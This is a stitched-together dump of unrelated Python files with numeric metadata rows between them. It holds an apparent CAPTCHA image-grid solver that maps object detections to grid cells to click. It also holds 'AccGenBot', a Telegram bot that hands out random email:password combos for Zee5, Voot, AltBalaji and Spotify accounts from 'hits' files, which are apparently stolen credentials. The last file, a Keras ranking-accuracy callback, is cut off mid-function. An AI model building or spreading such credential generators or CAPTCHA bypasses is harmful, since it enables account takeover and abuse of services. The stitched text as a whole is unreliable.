#print("\nObjects : ", boxes)
################################################################################################
if image.shape == (450, 450, 3):
print("\nİmage shape ", image.shape)
def box_path_x1(x1):
if x1 <= 112.5:
path_x1 = "G0"
return path_x1
if 112.5 < x1 <= 225:
path_x1 = "G1"
return path_x1
if 225 < x1 <= 337.5:
path_x1 = "G2"
return path_x1
if 337.5 < x1 <= 450:
path_x1 = "G3"
return path_x1
def box_path_x2(x2):
if x2 <= 112.5:
path_x2 = "G0"
return path_x2
if 112.5 < x2 <= 225:
path_x2 = "G1"
return path_x2
if 225 < x2 <= 337.5:
path_x2 = "G2"
return path_x2
if 337.5 < x2 <= 450:
path_x2 = "G3"
return path_x2
def box_path_y1(y1):
if y1 <= 112.5:
path_y1 = "G0"
return path_y1
if 112.5 < y1 <= 225:
path_y1 = "G4"
return path_y1
if 225 < y1 <= 337.5:
path_y1 = "G8"
return path_y1
if 337.5 < y1 <= 450:
path_y1 = "G12"
return path_y1
def box_path_y2(y2):
if y2 <= 112.5:
path_y2 = "G0"
return path_y2
if 112.5 < y2 <= 225:
path_y2 = "G4"
return path_y2
if 225 < y2 <= 337.5:
path_y2 = "G8"
return path_y2
if 337.5 < y2 <= 450:
path_y2 = "G12"
return path_y2
def box_corner(x,y):
if x == "G0" and y == "G0":
path = "G0"
return path
if x == "G0" and y == "G4":
path = "G4"
return path
if x == "G0" and y == "G8":
path = "G8"
return path
if x == "G0" and y == "G12":
path = "G12"
return path
if x == "G1" and y == "G0":
path = "G1"
return path
if x == "G1" and y == "G4":
path = "G5"
return path
if x == "G1" and y == "G8":
path = "G9"
return path
if x == "G1" and y == "G12":
path = "G13"
return path
if x == "G2" and y == "G0":
path = "G2"
return path
if x == "G2" and y == "G4":
path = "G6"
return path
if x == "G2" and y == "G8":
path = "G10"
return path
if x == "G2" and y == "G12":
path = "G14"
return path
if x == "G3" and y == "G0":
path = "G3"
return path
if x == "G3" and y == "G4":
path = "G7"
return path
if x == "G3" and y == "G8":
path = "G11"
return path
if x == "G3" and y == "G12":
path = "G15"
return path
box_bicycle = []
box_car = []
box_motorcycle = []
box_bus = []
box_boat = []
box_traffic_light = []
box_fire_hydrant = []
box_parking_meter = []
for a in range(len(boxes)):
x1 = boxes[a][0]
x1_box = box_path_x1(x1)
x2 = boxes[a][2] + x1
x2_box = box_path_x2(x2)
y1 = boxes[a][1]
y1_box = box_path_y1(y1)
y2 = boxes[a][3] + y1
y2_box = box_path_y2(y2)
x1y1 = box_corner(x=x1_box, y=y1_box)
x1y1_n = ""
for n in x1y1:
if n != "G":
x1y1_n += n
x2y1 = box_corner(x=x2_box, y=y1_box)
x2y1_n = ""
for n in x2y1:
if n != "G":
x2y1_n += n
x1y2 = box_corner(x=x1_box, y=y2_box)
x1y2_n = ""
for n in x1y2:
if n != "G":
x1y2_n += n
x2y2 = box_corner(x=x2_box, y=y2_box)
x2y2_n = ""
for n in x2y2:
if n != "G":
x2y2_n += n
x1y1_n = int(x1y1_n)
x2y1_n = int(x2y1_n)
x1y2_n = int(x1y2_n)
x2y2_n = int(x2y2_n)
if class_ids[a] == 1:
class_ids[a] = "Bicycle"
if x1y1 == x2y1 and x1y1 == x1y2 and x1y1 == x2y2:
click_box = [x1y1]
if click_box[0] not in box_bicycle:
box_bicycle.append(click_box[0])
else :
row_1 = []
row_2 = []
for top_line in range((x2y1_n-x1y1_n)+1):
row_1.append(x1y1_n + top_line)
for bottom_line in range((x2y2_n-x1y2_n)+1):
row_2.append(x1y2_n + bottom_line)
click_box = []
for i in range(len(row_1)):
click_box.append(row_1[i])
while row_1[i] < row_2[i]:
row_1[i] = row_1[i] + 4
click_box.append(row_1[i])
click_box.pop
for i in range(len(click_box)):
click_box[i] = str("G") + str(click_box[i])
if click_box[i] not in box_bicycle:
box_bicycle.append(click_box[i])
if class_ids[a] == 2:
class_ids[a] = "Car"
if x1y1 == x2y1 and x1y1 == x1y2 and x1y1 == x2y2:
click_box = [x1y1]
if click_box[0] not in box_car:
box_car.append(click_box[0])
else :
row_1 = []
row_2 = []
for top_line in range((x2y1_n-x1y1_n)+1):
row_1.append(x1y1_n + top_line)
for bottom_line in range((x2y2_n-x1y2_n)+1):
row_2.append(x1y2_n + bottom_line)
click_box = []
for i in range(len(row_1)):
click_box.append(row_1[i])
while row_1[i] < row_2[i]:
row_1[i] = row_1[i] + 4
click_box.append(row_1[i])
click_box.pop
for i in range(len(click_box)):
click_box[i] = str("G") + str(click_box[i])
if click_box[i] not in box_car:
box_car.append(click_box[i])
if class_ids[a] == 3:
class_ids[a] = "Motorcycle"
if x1y1 == x2y1 and x1y1 == x1y2 and x1y1 == x2y2:
click_box = [x1y1]
if click_box[0] not in box_motorcycle:
box_motorcycle.append(click_box[0])
else :
row_1 = []
row_2 = []
for top_line in range((x2y1_n-x1y1_n)+1):
row_1.append(x1y1_n + top_line)
for bottom_line in range((x2y2_n-x1y2_n)+1):
row_2.append(x1y2_n + bottom_line)
click_box = []
for i in range(len(row_1)):
click_box.append(row_1[i])
while row_1[i] < row_2[i]:
row_1[i] = row_1[i] + 4
click_box.append(row_1[i])
click_box.pop
for i in range(len(click_box)):
click_box[i] = str("G") + str(click_box[i])
if click_box[i] not in box_motorcycle:
box_motorcycle.append(click_box[i])
if class_ids[a] == 5:
class_ids[a] = "Bus"
if x1y1 == x2y1 and x1y1 == x1y2 and x1y1 == x2y2:
click_box = [x1y1]
if click_box[0] not in box_bus:
box_bus.append(click_box[0])
else :
row_1 = []
row_2 = []
for top_line in range((x2y1_n-x1y1_n)+1):
row_1.append(x1y1_n + top_line)
for bottom_line in range((x2y2_n-x1y2_n)+1):
row_2.append(x1y2_n + bottom_line)
click_box = []
for i in range(len(row_1)):
click_box.append(row_1[i])
while row_1[i] < row_2[i]:
row_1[i] = row_1[i] + 4
click_box.append(row_1[i])
click_box.pop
for i in range(len(click_box)):
click_box[i] = str("G") + str(click_box[i])
if click_box[i] not in box_bus:
box_bus.append(click_box[i])
if class_ids[a] == 8:
class_ids[a] = "Boat"
if x1y1 == x2y1 and x1y1 == x1y2 and x1y1 == x2y2:
click_box = [x1y1]
if click_box[0] not in box_boat:
box_boat.append(click_box[0])
else :
row_1 = []
row_2 = []
for top_line in range((x2y1_n-x1y1_n)+1):
row_1.append(x1y1_n + top_line)
for bottom_line in range((x2y2_n-x1y2_n)+1):
row_2.append(x1y2_n + bottom_line)
click_box = []
for i in range(len(row_1)):
click_box.append(row_1[i])
while row_1[i] < row_2[i]:
row_1[i] = row_1[i] + 4
click_box.append(row_1[i])
click_box.pop
for i in range(len(click_box)):
click_box[i] = str("G") + str(click_box[i])
if click_box[i] not in box_boat:
box_boat.append(click_box[i])
if class_ids[a] == 9:
class_ids[a] = "Traffic Light"
if x1y1 == x2y1 and x1y1 == x1y2 and x1y1 == x2y2:
click_box = [x1y1]
if click_box[0] not in box_traffic_light:
box_traffic_light.append(click_box[0])
else :
row_1 = []
row_2 = []
for top_line in range((x2y1_n-x1y1_n)+1):
row_1.append(x1y1_n + top_line)
for bottom_line in range((x2y2_n-x1y2_n)+1):
row_2.append(x1y2_n + bottom_line)
click_box = []
for i in range(len(row_1)):
click_box.append(row_1[i])
while row_1[i] < row_2[i]:
row_1[i] = row_1[i] + 4
click_box.append(row_1[i])
click_box.pop
for i in range(len(click_box)):
click_box[i] = str("G") + str(click_box[i])
if click_box[i] not in box_traffic_light:
box_traffic_light.append(click_box[i])
if class_ids[a] == 12:
class_ids[a] = "Parking meter"
if x1y1 == x2y1 and x1y1 == x1y2 and x1y1 == x2y2:
click_box = [x1y1]
if click_box[0] not in box_parking_meter:
box_parking_meter.append(click_box[0])
else :
row_1 = []
row_2 = []
for top_line in range((x2y1_n-x1y1_n)+1):
row_1.append(x1y1_n + top_line)
for bottom_line in range((x2y2_n-x1y2_n)+1):
row_2.append(x1y2_n + bottom_line)
click_box = []
for i in range(len(row_1)):
click_box.append(row_1[i])
while row_1[i] < row_2[i]:
row_1[i] = row_1[i] + 4
click_box.append(row_1[i])
click_box.pop
for i in range(len(click_box)):
click_box[i] = str("G") + str(click_box[i])
if click_box[i] not in box_parking_meter:
box_parking_meter.append(click_box[i])
################################################################################################
if image.shape == (300, 300, 3):
print("\nİmage shape ", image.shape)
def box_path_x1(x1):
if x1 <= 100:
path_x1 = "G0"
return path_x1
if 100 < x1 <= 200:
path_x1 = "G1"
return path_x1
if 200 < x1 <= 300:
path_x1 = "G2"
return path_x1
def box_path_x2(x2):
if x2 <= 100:
path_x2 = "G0"
return path_x2
if 100 < x2 <= 200:
path_x2 = "G1"
return path_x2
if 200 < x2 <= 300:
path_x2 = "G2"
return path_x2
def box_path_y1(y1):
if y1 <= 100:
path_y1 = "G0"
return path_y1
if 100 < y1 <= 200:
path_y1 = "G3"
return path_y1
if 200 < y1 <= 300:
path_y1 = "G6"
return path_y1
def box_path_y2(y2):
if y2 <= 100:
path_y2 = "G0"
return path_y2
if 100 < y2 <= 200:
path_y2 = "G3"
return path_y2
if 200 < y2 <= 300:
path_y2 = "G6"
return path_y2
def box_corner(x,y):
if x == "G0" and y == "G0":
path = "G0"
return path
if x == "G0" and y == "G3":
path = "G3"
return path
if x == "G0" and y == "G6":
path = "G6"
return path
if x == "G1" and y == "G0":
path = "G1"
return path
if x == "G1" and y == "G3":
path = "G4"
return path
if x == "G1" and y == "G6":
path = "G7"
return path
if x == "G2" and y == "G0":
path = "G2"
return path
if x == "G2" and y == "G3":
path = "G5"
return path
if x == "G2" and y == "G6":
path = "G8"
return path
box_bicycle = []
box_car = []
box_motorcycle = []
box_bus = []
box_boat = []
box_traffic_light = []
box_fire_hydrant = []
box_parking_meter = []
for a in range(len(boxes)):
x1 = boxes[a][0]
x1_box = box_path_x1(x1)
x2 = boxes[a][2] + x1
x2_box = box_path_x2(x2)
y1 = boxes[a][1]
y1_box = box_path_y1(y1)
y2 = boxes[a][3] + y1
y2_box = box_path_y2(y2)
x1y1 = box_corner(x=x1_box, y=y1_box)
x1y1_n = ""
for n in x1y1:
if n != "G":
x1y1_n += n
x2y1 = box_corner(x=x2_box, y=y1_box)
x2y1_n = ""
for n in x2y1:
if n != "G":
x2y1_n += n
x1y2 = box_corner(x=x1_box, y=y2_box)
x1y2_n = ""
for n in x1y2:
if n != "G":
x1y2_n += n
x2y2 = box_corner(x=x2_box, y=y2_box)
x2y2_n = ""
for n in x2y2:
if n != "G":
x2y2_n += n
x1y1_n = int(x1y1_n)
x2y1_n = int(x2y1_n)
x1y2_n = int(x1y2_n)
x2y2_n = int(x2y2_n)
if class_ids[a] == 1:
class_ids[a] = "Bicycle"
if x1y1 == x2y1 and x1y1 == x1y2 and x1y1 == x2y2:
click_box = [x1y1]
if click_box[0] not in box_bicycle:
box_bicycle.append(click_box[0])
else :
row_1 = []
row_2 = []
for top_line in range((x2y1_n-x1y1_n)+1):
row_1.append(x1y1_n + top_line)
for bottom_line in range((x2y2_n-x1y2_n)+1):
row_2.append(x1y2_n + bottom_line)
click_box = []
for i in range(len(row_1)):
click_box.append(row_1[i])
while row_1[i] < row_2[i]:
row_1[i] = row_1[i] + 3
click_box.append(row_1[i])
click_box.pop
for i in range(len(click_box)):
click_box[i] = str("G") + str(click_box[i])
if click_box[i] not in box_bicycle:
box_bicycle.append(click_box[i])
if class_ids[a] == 2:
class_ids[a] = "Car"
if x1y1 == x2y1 and x1y1 == x1y2 and x1y1 == x2y2:
click_box = [x1y1]
if click_box[0] not in box_car:
box_car.append(click_box[0])
else :
row_1 = []
row_2 = []
for top_line in range((x2y1_n-x1y1_n)+1):
row_1.append(x1y1_n + top_line)
for bottom_line in range((x2y2_n-x1y2_n)+1):
row_2.append(x1y2_n + bottom_line)
click_box = []
for i in range(len(row_1)):
click_box.append(row_1[i])
while row_1[i] < row_2[i]:
row_1[i] = row_1[i] + 3
click_box.append(row_1[i])
click_box.pop
for i in range(len(click_box)):
click_box[i] = str("G") + str(click_box[i])
if click_box[i] not in box_car:
box_car.append(click_box[i])
if class_ids[a] == 3:
class_ids[a] = "Motorcycle"
if x1y1 == x2y1 and x1y1 == x1y2 and x1y1 == x2y2:
click_box = [x1y1]
if click_box[0] not in box_motorcycle:
box_motorcycle.append(click_box[0])
else :
row_1 = []
row_2 = []
for top_line in range((x2y1_n-x1y1_n)+1):
row_1.append(x1y1_n + top_line)
for bottom_line in range((x2y2_n-x1y2_n)+1):
row_2.append(x1y2_n + bottom_line)
click_box = []
for i in range(len(row_1)):
click_box.append(row_1[i])
while row_1[i] < row_2[i]:
row_1[i] = row_1[i] + 3
click_box.append(row_1[i])
click_box.pop
for i in range(len(click_box)):
click_box[i] = str("G") + str(click_box[i])
if click_box[i] not in box_motorcycle:
box_motorcycle.append(click_box[i])
if class_ids[a] == 5:
class_ids[a] = "Bus"
if x1y1 == x2y1 and x1y1 == x1y2 and x1y1 == x2y2:
click_box = [x1y1]
if click_box[0] not in box_bus:
box_bus.append(click_box[0])
else :
row_1 = []
row_2 = []
for top_line in range((x2y1_n-x1y1_n)+1):
row_1.append(x1y1_n + top_line)
for bottom_line in range((x2y2_n-x1y2_n)+1):
row_2.append(x1y2_n + bottom_line)
click_box = []
for i in range(len(row_1)):
click_box.append(row_1[i])
while row_1[i] < row_2[i]:
row_1[i] = row_1[i] + 3
click_box.append(row_1[i])
click_box.pop
for i in range(len(click_box)):
click_box[i] = str("G") + str(click_box[i])
if click_box[i] not in box_bus:
box_bus.append(click_box[i])
if class_ids[a] == 8:
class_ids[a] = "Boat"
if x1y1 == x2y1 and x1y1 == x1y2 and x1y1 == x2y2:
click_box = [x1y1]
if click_box[0] not in box_boat:
box_boat.append(click_box[0])
else :
row_1 = []
row_2 = []
for top_line in range((x2y1_n-x1y1_n)+1):
row_1.append(x1y1_n + top_line)
for bottom_line in range((x2y2_n-x1y2_n)+1):
row_2.append(x1y2_n + bottom_line)
click_box = []
for i in range(len(row_1)):
click_box.append(row_1[i])
while row_1[i] < row_2[i]:
row_1[i] = row_1[i] + 3
click_box.append(row_1[i])
click_box.pop
for i in range(len(click_box)):
click_box[i] = str("G") + str(click_box[i])
if click_box[i] not in box_boat:
box_boat.append(click_box[i])
if class_ids[a] == 9:
class_ids[a] = "Traffic Light"
if x1y1 == x2y1 and x1y1 == x1y2 and x1y1 == x2y2:
click_box = [x1y1]
if click_box[0] not in box_traffic_light:
box_traffic_light.append(click_box[0])
else :
row_1 = []
row_2 = []
for top_line in range((x2y1_n-x1y1_n)+1):
row_1.append(x1y1_n + top_line)
for bottom_line in range((x2y2_n-x1y2_n)+1):
row_2.append(x1y2_n + bottom_line)
click_box = []
for i in range(len(row_1)):
click_box.append(row_1[i])
while row_1[i] < row_2[i]:
row_1[i] = row_1[i] + 3
click_box.append(row_1[i])
click_box.pop
for i in range(len(click_box)):
click_box[i] = str("G") + str(click_box[i])
if click_box[i] not in box_traffic_light:
box_traffic_light.append(click_box[i])
if class_ids[a] == 12:
class_ids[a] = "Parking meter"
if x1y1 == x2y1 and x1y1 == x1y2 and x1y1 == x2y2:
click_box = [x1y1]
if click_box[0] not in box_parking_meter:
box_parking_meter.append(click_box[0])
else :
row_1 = []
row_2 = []
for top_line in range((x2y1_n-x1y1_n)+1):
row_1.append(x1y1_n + top_line)
for bottom_line in range((x2y2_n-x1y2_n)+1):
row_2.append(x1y2_n + bottom_line)
click_box = []
for i in range(len(row_1)):
click_box.append(row_1[i])
while row_1[i] < row_2[i]:
row_1[i] = row_1[i] + 3
click_box.append(row_1[i])
click_box.pop
for i in range(len(click_box)):
click_box[i] = str("G") + str(click_box[i])
if click_box[i] not in box_parking_meter:
box_parking_meter.append(click_box[i])
################################################################################################
print("\n")
print("Bicycle => ", box_bicycle)
print("Car => ", box_car)
print("Motorcycle => ", box_motorcycle)
print("Bus => ", box_bus)
print("Boat => ", box_boat)
print("Traffic light => ", box_traffic_light)
print("Fire hydrant => ", box_fire_hydrant)
print("Parking meter => ", box_parking_meter)
| 33.172932
| 97
| 0.414665
| 3,260
| 26,472
| 3.129755
| 0.054908
| 0.131726
| 0.034304
| 0.030187
| 0.822013
| 0.816525
| 0.805155
| 0.755072
| 0.755072
| 0.755072
| 0
| 0.082415
| 0.458673
| 26,472
| 797
| 98
| 33.214555
| 0.629449
| 0.004382
| 0
| 0.809598
| 0
| 0
| 0.026102
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.01548
| false
| 0
| 0.009288
| 0
| 0.106811
| 0.020124
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
96988eae4c95c47ea17ffecb54903d94ca1585dd
| 3,405
|
py
|
Python
|
AccGenBot/plugins/acc.py
|
infotechbro/AccGenBot
|
ae87ed9d88aa7e11177e794417c6a7391b842b4e
|
[
"MIT"
] | 8
|
2021-04-24T03:27:07.000Z
|
2021-10-07T04:09:22.000Z
|
AccGenBot/plugins/acc.py
|
infotechbro/AccGenBot
|
ae87ed9d88aa7e11177e794417c6a7391b842b4e
|
[
"MIT"
] | null | null | null |
AccGenBot/plugins/acc.py
|
infotechbro/AccGenBot
|
ae87ed9d88aa7e11177e794417c6a7391b842b4e
|
[
"MIT"
] | 12
|
2021-04-24T05:16:56.000Z
|
2022-03-16T13:48:39.000Z
|
from AccGenBot import AccGen
from AccGenBot.verify import verify
from telethon import events, Button
import random
from Configs import Config
@AccGen.on(events.callbackquery.CallbackQuery(data="zee5"))
async def zee5(event):
check = await verify(Config.CHANNEL_US, event, AccGen)
if check is False:
await event.reply("**Join my channel to use me:)**", buttons=[
[Button.url("Join Channel", "{}".format(Config.CHANNEL_URL))]
])
return
with open('zee5.txt') as k:
hits = k.read().splitlines()
combo = random.choice(hits)
email, password = combo.split(":")
TEXT = f"""
<b>Generated Zee5 Acc</b>
<b>Combo:</b> <code>{email}:{password}</code>
<b>Email:</b> <code>{email}</code>
<b>Password:</b> <code>{password}</code>
<b>Generated By: @{event.sender.username}</b>
<b>ser-ID: {event.sender_id}</b>
"""
await event.edit(TEXT, parse_mode="HTML", buttons=[[Button.inline("Back", data="gen")]
])
@AccGen.on(events.callbackquery.CallbackQuery(data="voot"))
async def voot(event):
check = await verify(Config.CHANNEL_US, event, AccGen)
if check is False:
await event.reply("**Join my channel to use me:)**", buttons=[
[Button.url("Join Channel", "{}".format(Config.CHANNEL_URL))]
])
with open('voot.txt') as k:
hits = k.read().splitlines()
combo = random.choice(hits)
email, password = combo.split(":")
TEXT = f"""
<b>Generated Voot Acc</b>
<b>Combo:</b> <code>{email}:{password}</code>
<b>Email:</b> <code>{email}</code>
<b>Password:</b> <code>{password}</code>
<b>Generated By: @{event.sender.username}</b>
<b>ser-ID: {event.sender_id}</b>
"""
await event.edit(TEXT, parse_mode="HTML", buttons=[[Button.inline("Back", data="gen")]
])
@AccGen.on(events.callbackquery.CallbackQuery(data="alt"))
async def alt(event):
check = await verify(Config.CHANNEL_US, event, AccGen)
if check is False:
await event.reply("**Join my channel to use me:)**", buttons=[
[Button.url("Join Channel", "{}".format(Config.CHANNEL_URL))]
])
return
with open('alt.txt') as k:
hits = k.read().splitlines()
combo = random.choice(hits)
email, password = combo.split(":")
TEXT = f"""
<b>Generated AltBalaji Acc</b>
<b>Combo:</b> <code>{email}:{password}</code>
<b>Email:</b> <code>{email}</code>
<b>Password:</b> <code>{password}</code>
<b>Generated By: @{event.sender.username}</b>
<b>ser-ID: {event.sender_id}</b>
"""
await event.edit(TEXT, parse_mode="HTML", buttons=[[Button.inline("Back", data="gen")]
])
@AccGen.on(events.callbackquery.CallbackQuery(data="sp"))
async def zee5(event):
check = await verify(Config.CHANNEL_US, event, AccGen)
if check is False:
await event.reply("**Join my channel to use me:)**", buttons=[
[Button.url("Join Channel", "{}".format(Config.CHANNEL_URL))]
])
return
with open('sp.txt') as k:
hits = k.read().splitlines()
combo = random.choice(hits)
email, password = combo.split(":")
TEXT = f"""
<b>Generated Spotify Acc</b>
<b>Combo:</b> <code>{email}:{password}</code>
<b>Email:</b> <code>{email}</code>
<b>Password:</b> <code>{password}</code>
<b>Generated By: @{event.sender.username}</b>
<b>ser-ID: {event.sender_id}</b>
"""
await event.edit(TEXT, parse_mode="HTML", buttons=[[Button.inline("Back", data="gen")]
])
| 31.238532
| 90
| 0.628488
| 471
| 3,405
| 4.509554
| 0.150743
| 0.028249
| 0.037665
| 0.050847
| 0.904896
| 0.904896
| 0.884181
| 0.884181
| 0.884181
| 0.884181
| 0
| 0.001762
| 0.16652
| 3,405
| 108
| 91
| 31.527778
| 0.746653
| 0
| 0
| 0.793478
| 0
| 0
| 0.351836
| 0.120999
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.130435
| 0.054348
| 0
| 0.086957
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
73cae440862856f0f4ae47bceb45542017a1b799
| 17,346
|
py
|
Python
|
src/callback.py
|
fshdnc/disease_normalization
|
68b8fc118fe0f971fbd056ad2bffb44caa0e7abf
|
[
"Apache-2.0"
] | 1
|
2021-01-28T09:24:27.000Z
|
2021-01-28T09:24:27.000Z
|
src/callback.py
|
fshdnc/disease_normalization
|
68b8fc118fe0f971fbd056ad2bffb44caa0e7abf
|
[
"Apache-2.0"
] | 1
|
2019-07-08T03:25:30.000Z
|
2019-12-13T08:33:55.000Z
|
src/callback.py
|
fshdnc/disease_normalization
|
68b8fc118fe0f971fbd056ad2bffb44caa0e7abf
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
# coding: utf8
"""
A ranking accuracy callback.
Modified from: https://github.com/lfurrer/disease-normalization/blob/master/tzlink/rank/callback.py
"""
import numpy as np
import logging
logger = logging.getLogger(__name__)
from keras.callbacks import Callback
from keras.models import load_model
from datetime import datetime
import io
import model_tools
from cnn import semantic_similarity_layer
def save_model(model, path,now):
logger.info('Saving best model to {0}'.format(path+now))
model_name = path + now + '.json'
weights_name = path + now + '.h5'
model_tools.save_model(model, model_name, weights_name)
def evaluate(data_mentions, predictions, data_y):
'''
Input:
data_mentions: e.g. val_data.mentions, of the form [(start,end,untok_mention),(),...,()]
predictions: [[prob],[prob],...,[prob]]
data_y: e.g. val_data.y, of the form [[0],[1],...,[0]]
'''
assert len(predictions) == len(data_y)
correct = 0
logger.warning('High chance of same prediction scores.')
for start, end, untok_mention in data_mentions:
index_prediction = np.argmax(predictions[start:end],axis=0)
# print(index_prediction) # prediction same for first few epochs
if data_y[start:end][index_prediction] == 1:
correct += 1
total = len(data_mentions)
accuracy = correct/total
logger.info('Accuracy: {0}, Correct: {1}, Total: {2}'.format(accuracy,correct,total))
return accuracy
def write_training_info(conf,path):
import configparser
with open(path,'w',encoding='utf-8') as configfile: # save
conf.write(configfile)
class Timed(Callback):
'''
Calculates time taken.
'''
def __init__(self):
super().__init__()
self.before = None
self.after = None
def on_epoch_begin(self,epoch,logs={}):
self.before = datetime.now()
def on_epoch_end(self, epoch,logs={}):
self.after = datetime.now()
logger.info('Time taken for the epoch:{0}'.format(self.after-self.before))
class EarlyStoppingRankingAccuracy(Callback):
''' Ranking accuracy callback with early stopping.
'''
def __init__(self, conf, val_data):
super().__init__()
self.conf = conf
self.val_data = val_data
self.best = 0 # best accuracy
self.wait = 0
self.stopped_epoch = 0
self.model_path = conf['model']['path_model_whole']
self.save = int(self.conf['settings']['save_prediction'])
self.now = datetime.now().strftime('%Y%m%d-%H%M%S')
self.history = self.conf['settings']['history'] + self.now + '.txt'
write_training_info(self.conf,self.history)
def on_train_begin(self, logs={}):
self.losses = []
self.accuracy = []
self.wait = 0
with open(self.history,'a',encoding='utf-8') as fh:
# Pass the file handle in as a lambda function to make it callable
self.model.summary(print_fn=lambda x: fh.write(x + '\n'))
return
def on_epoch_end(self, epoch, logs={}):
self.losses.append(logs.get('loss'))
#before = datetime.now()
test_y = self.model.predict(self.val_data.x)
#after = datetime.now()
#logger.info('Time taken for prediction without speedup:{0}'.format(after-before))
evaluation_parameter = evaluate(self.val_data.mentions, test_y, self.val_data.y)
self.accuracy.append(evaluation_parameter)
with open(self.history,'a',encoding='utf-8') as f:
f.write('Epoch: {0}, Training loss: {1}, validation accuracy: {2}\n'.format(epoch,logs.get('loss'),evaluation_parameter))
if evaluation_parameter > self.best:
logging.info('Intermediate model saved.')
self.best = evaluation_parameter
self.model.save(self.model_path)
self.wait = 0
# something here to print trec_eval doc
else:
self.wait += 1
if self.wait > int(self.conf['training']['patience']):
self.stopped_epoch = epoch
self.model.stop_training = True
if self.save and self.model.stop_training:
logger.info('Saving predictions to {0}'.format(self.conf['model']['path_saved_predictions']))
model_tools.save_predictions(self.conf['model']['path_saved_predictions'],test_y) #(filename,predictions)
logger.info('Testing: epoch: {0}, self.model.stop_training: {1}'.format(epoch+1,self.model.stop_training))
return
def on_train_end(self, logs=None):
if self.stopped_epoch > 0:
logging.info('Epoch %05d: early stopping', self.stopped_epoch + 1)
if self.conf.getint('model','save'):
self.model = load_model(self.model_path,custom_objects={'semantic_similarity_layer': semantic_similarity_layer})
save_model(self.model, self.conf['model']['path'],self.now)
return
def on_batch_end(self, batch, logs={}):
self.losses.append(logs.get('loss'))
return
class EarlyStoppingRankingAccuracySpedUp(Callback):
''' Ranking accuracy callback with early stopping.
'''
def __init__(self, conf, val_data, concept_padded, corpus_padded,pretrained):
super().__init__()
self.conf = conf
self.val_data = val_data
self.concept_padded = concept_padded
self.corpus_padded = corpus_padded
self.pretrained = pretrained
self.convoluted_input = None
self.prediction_model = None
self.best = 0 # best accuracy
self.wait = 0
self.stopped_epoch = 0
self.model_path = conf['model']['path_model_whole']
self.save = int(self.conf['settings']['save_prediction'])
self.now = datetime.now().strftime('%Y%m%d-%H%M%S')
self.history = self.conf['settings']['history'] + self.now + '.txt'
write_training_info(self.conf,self.history)
def on_train_begin(self, logs={}):
self.losses = []
self.accuracy = []
self.wait = 0
with open(self.history,'a',encoding='utf-8') as fh:
# Pass the file handle in as a lambda function to make it callable
self.model.summary(print_fn=lambda x: fh.write(x + '\n'))
return
def on_epoch_end(self, epoch, logs={}):
self.losses.append(logs.get('loss'))
from cnn import forward_pass_speedup
before = datetime.now()
self.convoluted_input, self.prediction_model = forward_pass_speedup(self.model,self.corpus_padded,self.concept_padded,self.pretrained)
test_y = self.prediction_model.predict(self.convoluted_input)
after = datetime.now()
logger.info('Time taken for prediction with speedup:{0}'.format(after-before))
evaluation_parameter = evaluate(self.val_data.mentions, test_y, self.val_data.y)
self.accuracy.append(evaluation_parameter)
self.convoluted_input = None
self.prediction_model = None
with open(self.history,'a',encoding='utf-8') as f:
f.write('Epoch: {0}, Training loss: {1}, validation accuracy: {2}\n'.format(epoch,logs.get('loss'),evaluation_parameter))
if evaluation_parameter > self.best:
logging.info('Intermediate model saved.')
self.best = evaluation_parameter
self.model.save(self.model_path)
self.wait = 0
# something here to print trec_eval doc
else:
self.wait += 1
if self.wait > int(self.conf['training']['patience']):
self.stopped_epoch = epoch
self.model.stop_training = True
if self.save and self.model.stop_training:
logger.info('Saving predictions to {0}'.format(self.conf['model']['path_saved_predictions']))
model_tools.save_predictions(self.conf['model']['path_saved_predictions'],test_y) #(filename,predictions)
logger.info('Testing: epoch: {0}, self.model.stop_training: {1}'.format(epoch,self.model.stop_training))
return
def on_train_end(self, logs=None):
if self.stopped_epoch > 0:
logging.info('Epoch %05d: early stopping', self.stopped_epoch + 1)
if self.conf.getint('model','save'):
self.model = load_model(self.model_path,custom_objects={'semantic_similarity_layer': semantic_similarity_layer})
save_model(self.model, self.conf['model']['path'],self.now)
return
def on_batch_end(self, batch, logs={}):
self.losses.append(logs.get('loss'))
return
class EarlyStoppingRankingAccuracySpedUpSharedEncoder(Callback):
''' Ranking accuracy callback with early stopping.
'''
def __init__(self, conf, val_data, concept_padded, corpus_padded, pretrained):
super().__init__()
self.conf = conf
self.val_data = val_data
self.concept_padded = concept_padded
self.corpus_padded = corpus_padded
self.pretrained = pretrained
self.convoluted_input = None
self.prediction_model = None
self.best = 0 # best accuracy
self.wait = 0
self.stopped_epoch = 0
self.model_path = conf['model']['path_model_whole']
self.save = int(self.conf['settings']['save_prediction'])
self.now = datetime.now().strftime('%Y%m%d-%H%M%S')
self.history = self.conf['settings']['history'] + self.now + '.txt'
write_training_info(self.conf,self.history)
def on_train_begin(self, logs={}):
self.losses = []
self.accuracy = []
self.wait = 0
with open(self.history,'a',encoding='utf-8') as fh:
# Pass the file handle in as a lambda function to make it callable
self.model.summary(print_fn=lambda x: fh.write(x + '\n'))
return
def on_epoch_end(self, epoch, logs={}):
self.losses.append(logs.get('loss'))
from cnn import forward_pass_speedup_shared_encoder
before = datetime.now()
self.convoluted_input, self.prediction_model = forward_pass_speedup_shared_encoder(self.model,self.corpus_padded,self.concept_padded,self.pretrained)
test_y = self.prediction_model.predict(self.convoluted_input)
after = datetime.now()
logger.info('Time taken for prediction with speedup:{0}'.format(after-before))
evaluation_parameter = evaluate(self.val_data.mentions, test_y, self.val_data.y)
self.accuracy.append(evaluation_parameter)
self.convoluted_input = None
self.prediction_model = None
with open(self.history,'a',encoding='utf-8') as f:
f.write('Epoch: {0}, Training loss: {1}, validation accuracy: {2}\n'.format(epoch,logs.get('loss'),evaluation_parameter))
if evaluation_parameter > self.best:
logging.info('Intermediate model saved.')
self.best = evaluation_parameter
